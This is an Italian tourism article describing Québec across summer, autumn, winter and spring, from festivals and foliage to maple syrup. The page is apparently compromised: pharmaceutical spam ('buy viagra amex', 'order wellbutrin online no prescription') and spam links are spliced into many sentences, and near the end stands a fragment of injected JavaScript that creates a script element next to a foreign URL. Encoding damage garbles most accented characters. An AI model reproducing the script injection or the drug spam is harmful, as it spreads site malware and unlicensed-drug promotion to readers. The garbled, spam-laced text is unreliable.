Le quattro stagioni del QuA�bec

Le quattro stagioni del QuA�bec

Percorrete il QuA�bec in quattro tempi : estate, autunno, inverno e primavera. Godetevi il calore del buy 36 hour cialis online 382, buy viagra amex. sole estivo, i magnifici colori autunnali, le bianche e vivificanti distese invernali o la febbrile rinascita primaverile: sono i quattro momenti privilegiati che vi faranno innamorare del QuA�bec!

In un tripudio di colori, profumi e sapori ecco arrivare la��autunno, la stagione che va da Order settembre a novembre. A partire dalla fine di settembre le foreste si tingono delle calde sfumature del rosso, del giallo e della��arancio. Le viti e gli alberi da frutta sono carichi e pronti per la raccolta; stormi di oche delle nevi solcano i cieli e offrono, prima che giunga la��inverno, uno spettacolo grandioso!

1) La��estate

A partire da giugno, e spesso anche da maggio, la stagione si mette al bello stabilmente. Nelle cittA�, dove il caldo si apprezza fino ad agosto inoltrato, le strade si animano e riappaiono i tavolini alla��aperto: A? di nuovo estate! La��aroma delle grigliate stuzzica la��appetito e gli artisti di strada intrattengono i passanti. Approfittate della��estate per girare tutto il QuA�bec lungo le sue strade turistiche, riscoprite i piaceri acquatici, ammirate buy pills i giardini piA? belli o regalatevi una bella gita alla��aria aperta!

Per gli abitanti del QuA�bec la��estate A? il pretesto per far festa. Ovunque si celebrano con allegria la musica, la danza, il circo e la comicitA�, Buy ci si entusiasma di fronte ai fuochi da��artificio o ai voli di mongolfiere, si partecipa a concorsi di castelli di sabbia. Le manifestazioni sportive di alto livello tengono gli appassionati col fiato sospeso, mentre si moltiplicano gli spettacoli multimediali alla��aria aperta e le mostre da��arte.

I parchi nazionali vi faranno conoscere la natura da vicino. Osservate dalla spiaggia le foche che si crogiolano al sole o toglietevi lo sfizio di una bella camminata nel bosco. Con la canoa esplorate laghi, fiumi e perfino il mare sotto costa, approfittandone per fare un bel bagno. Ammirate le stelle cadenti con il richiamo delle strolaghe maggiori in sottofondo prima di fare ritorno alla vostra tenda.

In sella a una bicicletta percorrete gli itinerari della Route Verte (a�?strada verdea�?), Buy che conta oltre 5000 km di piste attraverso quasi tutte le regioni del QuA�bec. Cimentatevi sui tracciati da golf, moderni o classici, alcuni di rinomanza internazionale, in prossimitA� delle cittA� ma anche in contesti naturali da sogno.

Da viagra_super_active_100mg metA� giugno a metA� settembre gli abitanti delle cittA� approfittano della bella stagione per godere i piaceri della villeggiatura, spostandosi in riva ai laghi o al mare. Subite il richiamo del largo e rompete gli ormeggi per il tempo di una crociera sul fiume San Lorenzo. Osate avventurarvi lontano dai grandi centri: verso il QuA�bec marittimo, destinazione balneare per eccellenza, la��Abitibi-TA�miscamingue, ricco di laghi e foreste, e il Grande Nord, per una��avventura decisamente diversa dal solito.

2) La��autunno

Per chi ama fare movimento, la��autunno A? la stagione ideale per le escursioni a piedi o in bicicletta. NA� mancano le piacevoli distrazioni: molte regioni del QuA�bec si animano di festival dai nomi suggestivi, che propongono tutta una serie di attivitA� alla��aria aperta, quali le passeggiate e le risalite in seggiovia, spesso abbinate a programmi da��intrattenimento culturale.

La raccolta purchase liponexol delle mele offre il pretesto ideale per una piacevole a�� e gustosa! a�� visita ai frutteti delle regioni di MontA�rA�gie, Cantons-de-la��Est e Laurentides, per cogliere direttamente la frutta dalla��albero, fare un bel picnic o darsi alle degustazioni. Per completare questa tavolozza di colori e di sapori autunnali non mancate alla spettacolare raccolta dei mirtilli rossi (canneberges) nella regione del Centre-du-QuA�bec.

Non ca��A? niente di piA? affascinante che scoprire, girovagando per le strade del QuA�bec meridionale, i suggestivi pendii tappezzati di vigne, proprio come in Europa. I viticoltori producono tutta una gamma di vini, che sarete invitati a degustare sul posto. Anche la��idromele, i liquori artigianali e il sidro a�� soprattutto il rinomato cidre de glace, prodotto con mele gelate a�� vantano molti estimatori.

Le oche delle nevi in arrivo dal Grande Nord si concedono una breve sosta lungo le rive del San Lorenzo prima di raggiungere la loro residenza invernale, sulla costa orientale degli Stati Uniti. Lo spettacolo offerto da queste decine di migliaia di uccelli migratori, a riposo o in volo, e il baccano che producono vanno ben oltre la semplice curiositA� della natura!

La cartina qui sotto illustra la��avanzamento della colorazione del fogliame in alcuni settori, localitA� o siti del QuA�bec meridionale. La colorazione cambia a seconda del tipo di vegetazione ma anche della collocazione geografica a�� in particolare della latitudine a�� e della��esposizione al sole. La pioggia e il vento, che Purchase sopraggiungono spesso alla��improvviso, possono spogliare gli alberi del loro fogliame, modificandone sensibilmente la��apparenza autunnale, soprattutto verso la fine della stagione. Le valutazioni sono dunque fornite con le debite riserve.

3) La��inverno

Da novembre fino a marzo il QuA�bec vive secondo i ritmi di una stagione alla��insegna del dinamismo. E dato che la neve non si mantiene in eterno, meglio approfittarne quando ca��A?! Con la brina o con il gelo, sotto una

copiosa nevicata o il sole smagliante, la��occasione A? sempre buona per divertirsi e far festa. Venite a scoprire quali sono le attivitA�, corroboranti e divertenti, che i quebecchesi hanno saputo inventarsi per trarre il meglio dagli a�?sbalzi da��umorea�? della��inverno!

Una novantina di stazioni invernali, condizioni per la pratica dello sci e dello snowboard in notturna senza eguali in tutto il continente, una spessa coltre di neve immacolata: il QuA�bec riunisce in sA� le qualitA� che tutti gli appassionati sognano per divertirsi e praticare al meglio gli sport invernali. Se preferite scoprire il territorio a una��andatura sostenuta inforcate una motoslitta e filate lungo i laghi gelati fino al cuore del QuA�bec boreale. Siete piuttosto dei tipi contemplativi? Nessun problema: calzate le racchette da neve o gli sci di fondo e raggiungete in tutta tranquillitA� la natura piA? segreta.

La stagione fredda offre la��occasione per vivere esperienze inedite: escursioni nella foresta su slitte trainate dai cani, raid in quad lungo piste immacolate, arrampicata sulle cascate gelate… Gli alloggi in mezzo alla natura sanno essere comodi e rustici al tempo stesso: iurte, tende da accampamento, rifugi o, addirittura, igloo. Sia che puntiate alla taiga sterminata, ai mitici spazi aperti del Grande Nord o alle cime dei monti Appalachi, scoprirete che la��inverno in QuA�bec ha piA? che mai il profumo della��avventura!

Unitevi ai pescatori che sa��insediano nelle cabine Purchase disseminate sul grande fiume o su alcuni dei suoi affluenti, tutti ricoperti da uno spesso strato di ghiaccio. Quando giunge la stagione della pesca sul ghiaccio (o a�?pesca biancaa�?) la��atmosfera si fa piA? che mai conviviale e il pesce non potrebbe essere piA?… fresco! Il golfo del San Lorenzo accoglie gli appassionati della fauna, che non si lasciano sfuggire la��opportunitA� di avanzare sulla banchisa per osservare le foche e i loro piccoli al largo della��arcipelago delle AZles-de-la-Madeleine.

La��inverno ha le sue attrattive anche in cittA�. Dopo esservi cimentati con i pattini sulle piste di ghiaccio alla��aperto o lanciati giA? per i pendii con le camere da��aria gonfiate (per la gioia dei piA? piccoli), potrete assistete a una partita di hockey oppure, se vi trovate a MontrA�al, fare shopping al calduccio nella cittA� sotterranea. Il celebre Carnevale mette in fermento la cittA� di QuA�bec. La��HA?tel de glace, albergo interamente costruito con il ghiaccio http://www.aloemixers.com/blog/cheap-aygestin-generic/ nei pressi della capitale, risorge ogni anno nelle sue forme scintillanti. E per una pausa di meritato riposo, non ca��A? niente di meglio che un attrezzato centro benessere: i trattamenti termali, le cure personalizzate e i bagni nordici vi rimetteranno subito in carreggiata!

4) La primavera

Con quale fermento vengono salutati, verso la metA� di marzo, i primi tiepidi giorni di primavera! Le giornate si allungano, il sole si fa man mano piA? caldo, la neve comincia a sciogliersi. Di ritorno dalla loro migrazione invernale, le oche delle nevi disegnano nel cielo azzurro le loro immense e candide V. Il fiumi si liberano dalla morsa del ghiaccio e, gonfi da��acqua, richiamano come ogni anno order wellbutrin online no prescription gli appassionati del rafting. Bentornata primavera!

Stimolata dal susseguirsi stagionale del gelo e del disgelo, la linfa cialis peak time monta lentamente nel tronco degli aceri. I primi coloni appresero dai nativi a incidere la scorza della��albero e a farne fuoriuscire il liquido, che, una volta concentrato, si trasforma in uno sciroppo denso di cui si apprezzano colore, sapore e trasparenza. Questo rituale stagionale ha favorito lo sviluppo di una��industria fiorente, con un prodotto annuale di migliaia di ettolitri di sciroppo, di tire (estratto ancora piA? denso e concentrato) e di cosiddetto a�?zuccheroa�? da��acero a�� la��85% della��intera produzione canadese.

Prima di subire la sua trasformazione, il liquido sgorga dagli alberi goccia a goccia attraverso dei cannelli. Un tempo vi si attaccavano online dei secchi e se ne versava regolarmente il contenuto in a�?barilia�? trainati da cavalli. Con una concessione alla modernitA�, molte A�rabliA?res (alla lettera A�rabliA?re significa acereta, ma col tempo la parola ha preso a connotare tutta la��azienda produttiva) utilizzano oggi una rete di tubi che collegano i cannelli a una pompa; la linfa viene cosA� trasportata fino all’evaporatore. Occorrono circa 40 litri di linfa per produrre un solo litro di sciroppo puro.

Sono circa 400 le cabanes A� sucre (le tipiche costruzioni di legno dove viene prodotto lo sciroppo), per lo piA? situate in prossimitA� delle grandi cittA�, che accolgono in primavera i visitatori attorno alle loro tavole. Correte a gustare, con la famiglia o con gli amici, le prelibatezze di una cucina casalinga e tradizionale: fave al lardo, carne di maiale, tourtiA?re (tipica torta salata di carne), omelette, oreilles de crisse (lardo salato fritto) e, per dessert, tutta una scelta di dolci allo sciroppo da��acero, come la gustosissima tire, sciroppo caldo fatto indurire sulla neve intorno a un bastoncino. biaxin price canada E non perdete la��occasione di fare una bella gita in calesse nel bosco! Alcune cabanes A� sucre sono aperte al pubblico tutto la��anno; si possono comunque trovare prodotti della��acero nei negozi di alimentari in qualunque momento.

Dopo il lungo inverno, chi vive in cittA� non vede la��ora di godersi i primi raggi di sole e di respirare la��aria dolce e tiepida: ecco dunque gli aperitivi alla��aperto, i picnic alla��ombra degli alberi in fiore e le passeggiate rigeneranti nelle serre del Jardin botanique, splendido giardino botanico di MontrA�al. E per cominciare la stagione alla grande, perchA� non dedicare qualche giorno al recupero della forma e Cheap del benessere, in cittA� o in campagna?

 

Manolo Castagnetti

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script'); http://welchsokinawankarate.com/wp/?p=179

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>